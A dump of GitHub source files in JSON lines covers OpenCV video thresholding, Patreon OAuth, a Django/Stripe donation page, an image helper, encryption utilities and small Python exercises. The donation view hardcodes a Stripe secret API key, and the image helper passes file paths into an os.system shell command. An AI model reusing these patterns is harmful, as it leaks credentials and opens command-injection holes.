Computacional/05-matematicassencillas.py","file_name":"05-matematicassencillas.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"33066974970","text":"import cv2\nimport numpy as np\nimg = None\n\nCOLOR_RANGE=0.30\nWINDOW_NAME = \"Video\"\n\nlowers = []\nuppers = []\npixels = []\n\n# Retrieve the image pixel and define the lower and the upper\ndef capture_click(event,x,y,flags,param):\n global img,lowers,uppers\n if event == cv2.EVENT_LBUTTONDOWN and len(lowers) == 0 :\n # Array\n # [\n #\t[12 34 32],[231 33 42]\n # [22 33 44],[123 32 255]\n #]\n #\n pixel = img[y,x]\n\n # Divide to two subsections \n upperThreshold = img[np.where(img > pixel)]\n lowerThreshold = img[np.where(img <= pixel)]\n \n # Calculate the mean from both\n lowerMean = np.average(lowerThreshold.flatten())\n upperMean = np.average(upperThreshold.flatten())\n lowerMean = lowerMean*COLOR_RANGE\n upperMean = upperMean*COLOR_RANGE\n\t\n print(lowerMean,upperMean)\n # Find the upper and lower\n upper = np.array([int(pixel[0]+upperMean), int(pixel[1]+upperMean), int(pixel[2]+upperMean)])\n lower = np.array([int(pixel[0]-lowerMean), int(pixel[1]-lowerMean), int(pixel[2]-lowerMean)])\n #lower = np.array([int(pixel[0]-(finalMean)*pixel[0]), int(pixel[1]-(finalMean)*pixel[1]), int(pixel[2]-(finalMean)*pixel[2])])\n\n uppers.append(upper)\n lowers.append(lower)\n\ndef main():\n cam = cv2.VideoCapture(\"video.mp4\")\n\n cv2.namedWindow(WINDOW_NAME)\n\n img_counter = 0\n\n while True:\n ret, frame = cam.read()\n if not ret:\n print(\"failed to grab frame\")\n break\n global img\n cv2.setMouseCallback(WINDOW_NAME, capture_click)\n\n oldX,oldY,oldW,oldH = -1,-1,-1,-1\n global lowers,uppers\n\n # Blurring\n blur = cv2.blur(frame,(1,1))\n blur0=cv2.medianBlur(blur,5)\n blur1= cv2.GaussianBlur(blur0,(1,1),0)\n blur2= cv2.bilateralFilter(blur1,9,200,200)\n\n # Sharping\n sharp=cv2.addWeighted(frame,3,blur2,-2,0)\n\n # Erosion\n kernel = np.ones((1,1),np.uint8)\n sharp = cv2.erode(sharp,kernel,iterations = 1)\n\n img = sharp\n if(len(lowers) > 0):\n curLow = lowers[0]\n curUpp = uppers[0]\n\n\n kernel = np.ones((1,1),np.uint8)\n sharp = cv2.erode(sharp,kernel,iterations = 1)\n cv2.imshow(\"er\",sharp)\n\n # Create the mask\n mask = cv2.inRange(sharp,curLow,curUpp)\n\n cv2.imshow(\"mask\",mask)\n # Find the contours\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n if len(contours)>0:\n # Sort the contours\n cont_sort = sorted(contours, key=cv2.contourArea, reverse=True)\n area = max(cont_sort, key=cv2.contourArea)\n (xg,yg,wg,hg) = cv2.boundingRect(area)\n cv2.rectangle(frame,(xg,yg),(xg+wg, yg+hg),(69,69,255),2)\n cv2.imshow(WINDOW_NAME, frame)\n cv2.imshow(WINDOW_NAME, frame)\n\n k = cv2.waitKey(1)\n if k%256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n elif k%256 == 32:\n # SPACE pressed\n img_name = \"opencv_frame_{}.png\".format(img_counter)\n cv2.imwrite(img_name, frame)\n print(\"{} written!\".format(img_name))\n img_counter += 1\n\n cam.release()\n\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"echatzief/image_thresholding","sub_path":"sharpen.py","file_name":"sharpen.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28681042802","text":"import logging\nfrom datetime import datetime, timedelta\nfrom json import JSONDecodeError\nfrom typing import Optional\n\nimport requests\nfrom django.conf import settings\n\nfrom authn.exceptions import PatreonException\nfrom authn.providers.common import Membership, Platform\nfrom utils.date import first_day_of_next_month\n\nlog = logging.getLogger(__name__)\n\n\ndef fetch_auth_data(code: str) -> dict:\n try:\n response = requests.post(\n url=settings.PATREON_TOKEN_URL,\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\n \"code\": code,\n \"grant_type\": \"authorization_code\",\n \"client_id\": settings.PATREON_CLIENT_ID,\n \"client_secret\": settings.PATREON_CLIENT_SECRET,\n \"redirect_uri\": settings.PATREON_REDIRECT_URL,\n },\n )\n except requests.exceptions.RequestException as ex:\n raise PatreonException(ex)\n\n if response.status_code >= 400:\n log.warning(f\"Patreon error on login {response.status_code}: {response.text}\")\n raise PatreonException(response.text)\n\n try:\n return response.json()\n except JSONDecodeError:\n raise PatreonException(\"Patreon is down. Please try again\")\n\n\ndef refresh_auth_data(refresh_token: str) -> dict:\n try:\n response = requests.post(\n url=settings.PATREON_TOKEN_URL,\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\n \"refresh_token\": refresh_token,\n \"grant_type\": \"refresh_token\",\n \"client_id\": settings.PATREON_CLIENT_ID,\n \"client_secret\": settings.PATREON_CLIENT_SECRET,\n },\n )\n except requests.exceptions.RequestException as ex:\n log.warning(f\"Patreon error on refreshing token: {ex}\")\n raise PatreonException(ex)\n\n if response.status_code >= 400:\n log.warning(f\"Patreon error on refreshing token {response.status_code}: {response.text}\")\n raise PatreonException(response.text)\n\n try:\n return response.json()\n except JSONDecodeError:\n raise PatreonException(\"Patreon is down. Please try again\")\n\n\ndef fetch_user_data(access_token: str) -> dict:\n try:\n response = requests.get(\n url=settings.PATREON_USER_URL,\n headers={\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Authorization\": f\"Bearer {access_token}\",\n },\n params={\n \"include\": \"memberships\",\n \"fields[user]\": \"full_name,email,image_url,about\",\n \"fields[member]\": \"patron_status,last_charge_status,last_charge_date,pledge_relationship_start,\"\n \"lifetime_support_cents,currently_entitled_amount_cents\",\n },\n )\n except requests.exceptions.RequestException as ex:\n log.exception(f\"Patreon error on fetching user data: {ex}\")\n raise PatreonException(ex)\n\n if response.status_code >= 400: # unauthorized etc\n log.warning(\n f\"Patreon error on fetching user data {response.status_code}: {response.text}\"\n )\n raise PatreonException(response.text)\n\n try:\n return response.json()\n except JSONDecodeError:\n raise PatreonException(\"Patreon is down. Please try again\")\n\n\ndef parse_active_membership(user_data: dict) -> Optional[Membership]:\n log.info(f\"Parse membership: {user_data}\")\n\n if not user_data or not user_data.get(\"data\") or not user_data.get(\"included\"):\n return None\n\n for membership in user_data[\"included\"]:\n if membership[\"attributes\"][\"patron_status\"] == \"active_patron\" \\\n and membership[\"attributes\"][\"last_charge_status\"] == \"Paid\":\n\n now = datetime.utcnow()\n\n membership_started_at = datetime.strptime(\n str(membership[\"attributes\"][\"pledge_relationship_start\"])[:10], \"%Y-%m-%d\"\n ) if membership[\"attributes\"][\"pledge_relationship_start\"] else now\n\n last_charged_at = None\n if membership[\"attributes\"][\"last_charge_date\"]:\n last_charged_at = datetime.strptime(\n str(membership[\"attributes\"][\"last_charge_date\"])[:10], \"%Y-%m-%d\"\n )\n\n if last_charged_at:\n membership_expires_at = last_charged_at + timedelta(days=45)\n else:\n membership_expires_at = first_day_of_next_month(now) + timedelta(days=7)\n\n return Membership(\n platform=Platform.patreon,\n user_id=user_data[\"data\"][\"id\"],\n full_name=user_data[\"data\"][\"attributes\"][\"full_name\"],\n email=user_data[\"data\"][\"attributes\"][\"email\"],\n image=None, # user_data[\"data\"][\"attributes\"][\"image_url\"],\n started_at=membership_started_at,\n charged_at=last_charged_at,\n expires_at=membership_expires_at,\n lifetime_support_cents=int(membership[\"attributes\"][\"lifetime_support_cents\"] or 0),\n currently_entitled_amount_cents=int(membership[\"attributes\"][\"currently_entitled_amount_cents\"] or 0),\n )\n\n return None\n","repo_name":"vas3k/vas3k.club","sub_path":"authn/providers/patreon.py","file_name":"patreon.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","stars":685,"dataset":"github-code","pt":"75"} +{"seq_id":"29091235524","text":"def piscope():\n import multiprocessing as mp\n import pkg_resources # somehow importing this later cause warning message\n import mpl_toolkits\n import sys\n import os\n import wx\n import weakref\n import matplotlib\n import shutil\n import warnings\n\n import platform\n if platform.system() == 'Darwin':\n mp.set_start_method('spawn')\n else:\n if 'forkserver' in mp.get_all_start_methods():\n mp.set_start_method('forkserver')\n\n matplotlib.use('WXAGG')\n\n wx.UpdateUIEvent.SetMode(wx.UPDATE_UI_PROCESS_SPECIFIED)\n wx.UpdateUIEvent.SetUpdateInterval(1000)\n\n import ifigure\n from ifigure.ifigure_app import ifigure_app, MyApp\n from ifigure.utils.mp_tarzip import MPTarzip\n from os.path import expanduser\n\n # if it does not have write permission to current directory\n # it moves to home directory\n # make tempfile need write permission in some case?\n # (2014 10)\n if not os.access(os.getcwd(), os.W_OK):\n print('No access to current working directory, moving to home directory')\n os.chdir(expanduser('~'))\n\n import site\n home = expanduser('~')\n site.USER_SITE = os.path.join(\n home, '.ifigure_rc', '.local', 'site-packages')\n site.USER_BASE = os.path.join(home, '.ifigure_rc', '.local')\n redirect_std = True\n use_console = True\n file = None\n start_server = False\n show_file_open_error = False\n exe_command = None\n hide_main = False\n\n class MainlevelJob(object):\n def __init__(self):\n self.func = None\n self.func2 = []\n\n def setjob(self, func):\n self.func = func\n\n def dojob(self):\n if self.func is not None:\n self.func()\n self.func = None\n\n def setfinishjob(self, func):\n if not func in self.func2:\n self.func2.append(func)\n\n def finishjob(self):\n for f in self.func2:\n f()\n\n # this is a place where wdir is set when exiting\n # the program\n import __main__\n __main__.xxx = []\n launcher_file = None\n use_gl = True\n if len(sys.argv[1:]) >= 1:\n rflag = False\n lflag = False\n for p in sys.argv[1:]:\n if p == '-h':\n print('[Usage: ifigure -s -r command -h file]')\n print('ifigure : start a new project')\n print('ifigure : open an existing project')\n print('-s : start server thread')\n print('-d : suppress console redirect')\n print('-c : completely suppress redirect')\n print('-n : no main window')\n print('-p : call profiler')\n print('-r : run command')\n print('-h : show this help')\n print('-g : turn off gl')\n print('-w : warning on')\n print('-ww : warning on (error)')\n print('-l : file to commnicate with launcher ')\n sys.exit()\n elif p == '-s':\n start_server = True\n redirect_std = True\n __main__.process_server_request = False\n\n server = ifigure.server.Server()\n server.start()\n continue\n elif p == '-d':\n use_console = False\n redirect_std = False\n print('debug mode (console is suppressed. all redirect is off')\n continue\n elif p == '-c':\n use_console = False\n print('debug mode (console is suppressed, but thread log window is on)')\n continue\n elif p == '-n':\n hide_main = True\n continue\n elif p == '-p':\n pr = None\n import cProfile\n print('starting profiler')\n pr = cProfile.Profile()\n pr.enable()\n elif p == '-r':\n rflag = True\n elif p == '-l':\n lflag = True\n elif p == '-g':\n use_gl = False\n elif p == '-w':\n warnings.simplefilter('always')\n print('debug mode (warning is on)')\n elif p == '-ww':\n warnings.simplefilter('error')\n print('debug mode (warning cuases error)')\n else:\n if rflag:\n if len(p) > 0:\n p = p.strip()\n if p.startswith('\"'):\n exe_command = p[1:-1]\n elif p.startswith(\"'\"):\n exe_command = p[1:-1]\n else:\n exe_command = p\n if exe_command.strip() == '':\n exe_command = None\n rflag = False\n elif lflag:\n launcher_file = p.strip()\n lflag = False\n else:\n if os.path.exists(p):\n file = p\n print(('opening file : '+file))\n file = os.path.abspath(file)\n else:\n show_file_open_error = True\n filename = p\n file = None\n from ifigure.widgets.appearance_config import AppearanceConfig\n appearanceconfig = AppearanceConfig()\n\n import ifigure.widgets.canvas.ifigure_canvas\n import ifigure.matplotlib_mod.backend_wxagg_gl as wxagg_gl\n if use_gl:\n use_gl = appearanceconfig.setting['gl_use']\n if use_gl:\n ifigure.widgets.canvas.ifigure_canvas.turn_on_gl = use_gl\n wxagg_gl.use_gl_12 = appearanceconfig.setting['gl_use_12']\n wxagg_gl.load_glcanvas(debug=True)\n else:\n print('No 3D plot (OpenGL turned off)')\n\n ifigure.ifigure_app.redirect_std = redirect_std\n ifigure.ifigure_app.use_console = use_console\n# from ifigure.utils.rollback_importer import RollbackImporter as RI\n from ifigure.mto.treedict import fill_td_name_space\n\n sc = os.path.join(os.path.dirname(ifigure.__file__),\n 'mto', 'treedict_ns.py')\n if os.path.exists(sc):\n fill_td_name_space(sc)\n from ifigure.ifigure_config import rcdir\n sc = os.path.join(rcdir, 'treedict_ns.py')\n if os.path.exists(sc):\n fill_td_name_space(sc)\n\n app = MyApp(False, clearSigInt=False)\n ifig_app = app.get_ifig_app()\n\n if show_file_open_error:\n ifig_app.shell.write('### File not found : ' + filename)\n\n if file is not None:\n if file[-4:] == '.pfz':\n ifig_app.proj_tree_viewer.update_widget()\n #ifig_app.open_file(file, call_close=True)\n # ifig_app.set_proj_saved(True)\n #wx.CallAfter(ifig_app.onOpen, path =file)\n # somehow this seems work, but others may not open\n # figure windows associated to the project file\n wx.CallLater(10, ifig_app.onOpen, path=file)\n\n # ifig_app.draw_all()\n # ifig_app.set_filename_2_window_title()\n elif file[-4:] == '.bfz':\n bk = ifig_app.proj.load_subtree(file, compress=True)\n from ifigure.mto.fig_book import FigBook\n if not isinstance(bk, FigBook):\n sys.exit()\n ifig_app.ipage = 0\n bk.setvar(\"original_filename\", file)\n# bk.set_open(True)\n ifig_app.book = bk\n# obk.destroy()\n ifigure.events.SendChangedEvent(bk, w=ifig_app)\n ifigure.events.SendOpenBookEvent(bk, w=ifig_app)\n# ifig_app.show_page(ifig_app.ipage)\n else:\n wx.CallLater(3, ifig_app.onOpenWithHelperCommand,\n path=file, hide_main=hide_main)\n# ifig_app.open_book_in_appwindow(ifig_app.proj.book1, ipage=0)\n\n if start_server:\n ifig_app.use_server()\n __main__.process_server_request = True\n port = server.info()[3]\n print('remote port is open : port = ' + str(port) + '\\n')\n\n # call tempdir_clean when ifig_app is being deleted\n class TempdirObj(object):\n pass\n ifig_app._tempdir_obj = TempdirObj()\n from ifigure.ifigure_config import tempdir_clean\n tempdir_ref = weakref.ref(ifig_app._tempdir_obj, tempdir_clean)\n\n # reduce update events\n wx.UpdateUIEvent.SetMode(wx.UPDATE_UI_PROCESS_SPECIFIED)\n\n# if pr is not None:\n# from ifigure.interactive import profile_stop\n# profile_stop(pr, sortby='cumulative')\n\n if exe_command is not None:\n if hide_main:\n wx.CallAfter(ifig_app.shell.execute_and_hide_main, exe_command)\n else:\n wx.CallAfter(ifig_app.shell.Execute, exe_command)\n if hide_main and exe_command is None:\n # i don't know if this is necessary hide_main and exe_command\n # is used together for normal situation.\n wx.CallAfter(ifig_app.goto_no_mainwindow)\n # conditions for iptyhon\n ifig_app.set_launcher_file(launcher_file)\n\n from ifigure.widgets.taskbar import TaskBarIcon\n tbicon = TaskBarIcon()\n\n app.MainLoop()\n\n server = ifigure.server.Server()\n if server.info()[0]:\n server.stop()\n\n if not MPTarzip().isReady():\n # seems like it is not necessary since wx.CallLater\n # im MPTarzip makes sure that the program does not\n # come here before save process finishes.\n\n # anyway, just in case...\n print('waiting for save to be done')\n MPTarzip().worker.join()\n #\n # deleting the wdir used last moment...\n #\n wdirs = __main__.xxx\n for wdir in wdirs:\n if os.path.exists(wdir):\n print(('deleting :', wdir))\n shutil.rmtree(wdir)\n# MDSWorkerPool(type=worker_mode).reset()\n print('main loop finished')\n print('following is for debug to check if normal exit')\n import threading\n import time\n time.sleep(1)\n for t in threading.enumerate():\n print(t)\n print((wx.GetTopLevelWindows()))\n","repo_name":"piScope/piScope","sub_path":"python/ifigure/piscope.py","file_name":"piscope.py","file_ext":"py","file_size_in_byte":10232,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"} +{"seq_id":"645413721","text":"#filename=input(\"Enter filename: \")\n#print (\"The file name is: %s\" % (filename))\n# pętla, któa działa do momentu kiedy nie wpiszemy wartości decymalnej /liczbowej/\nwhile True:\n filesizeStr=input(\"Enter the max file size (MB): \")\n if filesizeStr.isdecimal():\n filesizeInt=int(filesizeStr)\n break\nprint (\"The max size is %d\" % (filesizeInt))\nprint (\"Size in KB is %d\" % (filesizeInt*1024))\n\n\n","repo_name":"daniel-majo/udemy_podstawy","sub_path":"ZebranePrace/75_dane_użytkownika.py","file_name":"75_dane_użytkownika.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71804341682","text":"import datetime\n\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom .models import Donate\nfrom home.models import Profile\nfrom django.http import HttpResponseRedirect\nfrom rest_framework.status import HTTP_200_OK\nfrom .serializers import DonateSerializer\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\n\nimport stripe\n\nstripe.api_key = \"sk_test_51Jtlh9EiJAngkF1R6wywckuD1gOYyieoOBqg4EaP2STpe8GYoMp0iDTNpjBF1PeCUxbMkGQaxt8djtqOmjxfuTzG00yk4bAExN\"\n\n\ndef index(request):\n if request.user.is_authenticated:\n today = datetime.datetime.now()\n data = {'Profile': Profile.objects.get(user_ID=request.user.id),\n 'Donations': Donate.objects.filter(date_donated__year=today.year, date_donated__month=today.month)\n }\n return render(request, 'donate/donate.html', data)\n else:\n return redirect('/login/')\n\n\ndef charge(request):\n if request.method == 'POST':\n print('Data:', request.POST)\n\n amount = int(request.POST['amount'])\n\n customer = stripe.Customer.create(\n email=request.POST['email'],\n name=request.user.username,\n source=request.POST['stripeToken']\n )\n\n charge = stripe.Charge.create(\n customer=customer,\n amount=amount * 100,\n currency='usd',\n description=\"Donation\"\n )\n user = User.objects.get(id=request.user.id)\n donation = Donate(amount=amount, user_ID=user)\n donation.save()\n\n return redirect(reverse('success', args=[amount]))\n\n\ndef successMsg(request, args):\n amount = args\n data = {\n 'Profile': Profile.objects.get(user_ID=request.user.id),\n 'amount': amount\n }\n return render(request, 'donate/success.html', data)\n\n\n# Donate API\nclass DonateAPI(APIView):\n def get(self, request, *arg, **kwargs):\n ObjDonate = Donate.objects.all()\n serializer = DonateSerializer(ObjDonate, many=True)\n return Response(serializer.data, status=HTTP_200_OK)\n\n def post(self, request, *args, **kwargs):\n serializer = DonateSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors)\n","repo_name":"thngph/zooTPJ","sub_path":"donate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1682072474","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('alumni', '0013_auto_20150718_1010'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='beroep',\n name='persoon',\n field=models.ForeignKey(default=1, to='alumni.Persoon'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='contact',\n name='contacttype',\n field=models.CharField(default='gsm', max_length=10, choices=[('twitter', 'Twitter'), ('linkedin', 'LinkedIn'), ('telefoon', 'Telefoon'), ('gsm', 'GSM'), ('website', 'Website')]),\n ),\n migrations.AlterField(\n model_name='persoon',\n name='geslacht',\n field=models.CharField(default='M', max_length=1, choices=[('V', 'vrouw'), ('?', 'onbekend'), ('M', 'man'), ('A', 'ander')]),\n ),\n ]\n","repo_name":"mvuijlst/alumni","sub_path":"repertorium/alumni/migrations/0014_auto_20150718_1251.py","file_name":"0014_auto_20150718_1251.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15162087419","text":"import os\nimport requests\nimport datetime\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Image:\n\n BaseDir = r\".\\Resources\\Images\"\n\n\n @staticmethod\n def GetFromUrl(url:str, name:str):\n \"\"\"Get an image from the given url, save it to the given name, and return the directory of the image\"\"\"\n\n directory = os.path.join(Image.BaseDir, name)\n\n if os.path.isfile(directory):\n # change the directory name to a unique one\n \n # split the name to name and extension\n name, extension = os.path.splitext(name)\n \n # create a new name\n name = name + \"_\" + datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") + extension\n \n directory = os.path.join(Image.BaseDir, name)\n\n try:\n # Get the image from the url\n response = requests.get(url)\n\n if response.status_code == 200:\n \n with open(directory, \"wb\") as f:\n f.write(response.content)\n \n return directory\n \n else:\n return None\n\n except Exception as e:\n return None\n\n\n @staticmethod\n def GetFromDirectory(path: str):\n \"\"\"Copy the image form the directory in the image resources and return the new directory\"\"\"\n\n if os.path.dirname(path) == Image.BaseDir:\n if os.path.isfile(path):\n return path\n\n if os.path.isfile(path):\n \n # copy the image to BaseDir\n \n name = os.path.basename(path)\n destination = os.path.join(Image.BaseDir, name)\n\n if os.path.isfile(destination):\n \n # check if two images has the same content\n with open(path, \"rb\") as f:\n if f.read() == open(destination, \"rb\").read():\n return destination\n\n # change the destination name to a unique one\n # split the name to name and extension\n name, extension = os.path.splitext(name)\n\n # create a new name\n name = name + \"_\" + datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") + extension\n\n destination = os.path.join(Image.BaseDir, name)\n\n os.system(f\"copy \\\"{os.path.abspath(path)}\\\" \\\"{os.path.abspath(destination)}\\\"\")\n\n return destination\n\n else:\n return None\n\n\n @staticmethod\n def Browse(window : QtWidgets.QMainWindow):\n \"\"\"opens a browse dialog and returns selected path\"\"\"\n\n return QtWidgets.QFileDialog.getOpenFileName(window, \"Open File\", \".\\\\\", \"Image Files (*.png *.jpg *.bmp *.gif)\")[0]\n\n\n @staticmethod\n def DefaultUserImagePath():\n return os.path.join(Image.BaseDir, \"user_default.png\")\n\n @staticmethod\n def DefaultFoodImagePath():\n return os.path.join(Image.BaseDir, \"food_default.png\")","repo_name":"Mohsen-Rahimi8001/AP4002_Group2","sub_path":"Lib/Image.py","file_name":"Image.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"30884080173","text":"from cryptography.fernet import Fernet\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\nfrom Crypto import Random\nfrom base64 import b64encode, b64decode, urlsafe_b64encode\nimport os\n\n\"\"\"\nThis module basically exists to provide some security for when RouteWatch supports external DBs, allowing the secure\nstorage of access credentials in an \"untrusted\" location.\nAt the time of writing the cryptography library used defaults to AES-CBC-128 with HMAC-SHA256 authentication and is\nwidely believed to be a cryptographically secure implementation.\n\"\"\"\n\n\ndef get_secret():\n \"\"\"\n Finds or creates a new secret for use with the encrypt and decrypt functions.\n :return:\n :rtype: bytes\n \"\"\"\n with open(\"master.key\", \"ba+\") as f:\n # Checks the size of the secret and loads it if it's valid\n if os.path.getsize(\"master.key\") != 32: # If it's not the correct length it generates a new one and stores it.\n f.seek(0)\n r = Random.new()\n secret = r.read(32)\n f.write(secret)\n else:\n f.seek(0)\n secret = f.read(32)\n return secret\n\n\ndef encrypt(data, secret):\n \"\"\"\n Basically wraps the cryptography lib to reduce code duplication\n :param data:\n :type data: bytes\n :param secret:\n :type secret: bytes\n :return:\n :rtype: bytes, str\n \"\"\"\n # Generate a cryptographically secure salt\n r = Random.new()\n salt = r.read(16)\n # Generates a suitable key from the secret by HMACing it with the salt\n kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=100000, backend=default_backend())\n key = urlsafe_b64encode(kdf.derive(secret))\n # Encrypts the data\n f = Fernet(key)\n ciphertext = f.encrypt(data)\n return b64encode(salt + ciphertext)\n\n\ndef decrypt(encodedciphertext, secret):\n \"\"\"\n Basically wraps the cryptography lib to reduce code duplication\n :param encodedciphertext:\n :type encodedciphertext: bytes\n :param secret:\n :type secret: bytes\n :return:\n \"\"\"\n # Split out the salt from the ciphertext\n ciphertext = b64decode(encodedciphertext)\n salt = ciphertext[:16]\n ciphertext = ciphertext[16:]\n # Regenerates the key by HMACing the secret with the salt\n kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=100000, backend=default_backend())\n key = urlsafe_b64encode(kdf.derive(secret))\n # Decrypts the data\n f = Fernet(key)\n data = f.decrypt(ciphertext)\n return data\n","repo_name":"nerdalize/routewatch","sub_path":"routewatch/Security/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"34977660304","text":"class ProfanityFilter:\n\n def __init__(self, keywords, template):\n self.__keywords = sorted(keywords, key=len, reverse=True)\n self.__template = template\n\n def __clear__(self, message):\n lowercase_input = message.lower()\n for bad_word in self.__keywords:\n if lowercase_input.__contains__(bad_word):\n if len(bad_word) >= 3:\n profanity = (len(bad_word) // 3) * self.__template\n if not len(bad_word) % 3 == 0:\n profanity += self.__template[: (len(bad_word) % 3)]\n message = message.lower().replace(bad_word, profanity)\n else:\n message = message.lower().replace(bad_word, self.__template[: (len(bad_word) % 3)])\n return message\n\n def filter(self, msg):\n cleared_msg = ProfanityFilter.__clear__(self, msg)\n copy = \"\"\n for i, v in enumerate(msg.split(\" \")):\n if v.lower() in cleared_msg:\n copy += v + \" \"\n else:\n copy += cleared_msg.split(\" \")[i] + \" \"\n return copy[:-1]\n\n\n# You can play around with your implementation in the body of the following 'if'.\n# The contained statements will be ignored while evaluating your solution.\nif __name__ == '__main__':\n f = ProfanityFilter([\"duck\", \"shot\", \"batch\", \"mastard\", \"z\"], \"?#$\")\n offensive_msg = \"Abc defghi Mastard mastard jklmno mastard Z\"\n clean_msg = f.filter(offensive_msg)\n print(clean_msg) # abc defghi ?#$?#$? jklmno\n","repo_name":"LiamK21/UZH-Inf-Exercises-1","sub_path":"Exercises INF 1/Exercise 8/Exercise8Task1.py","file_name":"Exercise8Task1.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"29447289371","text":"import torch\nfrom torchvision import models\n\nfrom lighter.decorator import config\nfrom lighter.model import BaseModule\n\n\nclass InceptionNetFeatureExtractionModel(BaseModule):\n @config(path='models/inception.config.json', property='model')\n def __init__(self):\n super(InceptionNetFeatureExtractionModel, self).__init__()\n self.inception = models.inception_v3(pretrained=self.config.model.pretrained,\n aux_logits=self.config.model.aux_logits).to(self.device)\n for param in self.inception.parameters():\n param.requires_grad = not self.config.model.freeze_pretrained\n self.hidden = torch.nn.Linear(self.inception.fc.out_features,\n self.config.model.hidden_units).to(self.device)\n self.final = torch.nn.Linear(self.config.model.hidden_units,\n self.config.model.output).to(self.device)\n\n def forward(self, x):\n h = self.inception(x)\n h = torch.relu(h)\n h = self.hidden(h)\n h = torch.relu(h)\n h = self.final(h)\n return torch.sigmoid(h)\n","repo_name":"Xpitfire/lighter","sub_path":"examples/coco_looking/models/inception.py","file_name":"inception.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"10574927333","text":"#!/bin/python3\n# source : https://www.hackerrank.com/challenges/encryption/problem\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the encryption function below.\ndef encryption(s):\n l = len(s)\n row = math.floor(math.sqrt(l))\n col = math.ceil(math.sqrt(l))\n\n if row * col < l:\n row+=1\n \n #print(row)\n #print(col)\n \n result=[]\n for i in range(col):\n for j in range(row):\n try:\n #print(i,j)\n result.append(s[i+ (j*col) ])\n except:\n result.append(' ')\n \n result.append(' ')\n \n tmp_string = ''.join(result)\n tmp_string = re.sub(' +', ' ', tmp_string)\n\n return tmp_string\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = encryption(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"Bruck1701/CodingInterview","sub_path":"generalAlgorithms/hackerRank/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"2462726536","text":"number = int(input())\ncurrent = 0\nflag = True\nfor row in range(1, number + 1):\n for amount_of_numbers_to_print in range(1, row + 1):\n current += 1\n print(current, end=\" \")\n if current == number:\n flag = False\n break\n if not flag:\n break\n print()","repo_name":"Nikikapralov/Python","sub_path":"SoftUni/Python Basics/6-Nested loops/Exercises/01-Numbers_Pyramid.py","file_name":"01-Numbers_Pyramid.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"30851361699","text":"'''Crie um programa que simule o funcionamento de um caixa eletrônico. \nNo início, pergunte ao usuário qual será o valor a ser sacado (número inteiro) e o programa vai informar \nquantas cédulas de cada valor serão entregues.\nOBS: considere que o caixa possui cédulas de R$50, R$20, R$10 e R$1.'''\nvalor = int(input('Valor a sacar: '))\n\nlista = [50, 20, 10, 1]\nfor c in lista:\n cinquenta = valor // c\n valor -= (cinquenta * c)\n\n vinte = valor // c\n valor -= (vinte * c)\n\n dez = valor // c\n valor -= (dez * c)\n\n um = valor // c\n valor -= (um * c)\n\n print(cinquenta)\n print(vinte)\n print(dez)\n print(um)\nprint(f'Notas de R$50: {cinquenta}')\nprint(f'Notas de R$20: {vinte}')\n# print(f'Notas de R$10: {}')\n# print(f'Notas de R$1: 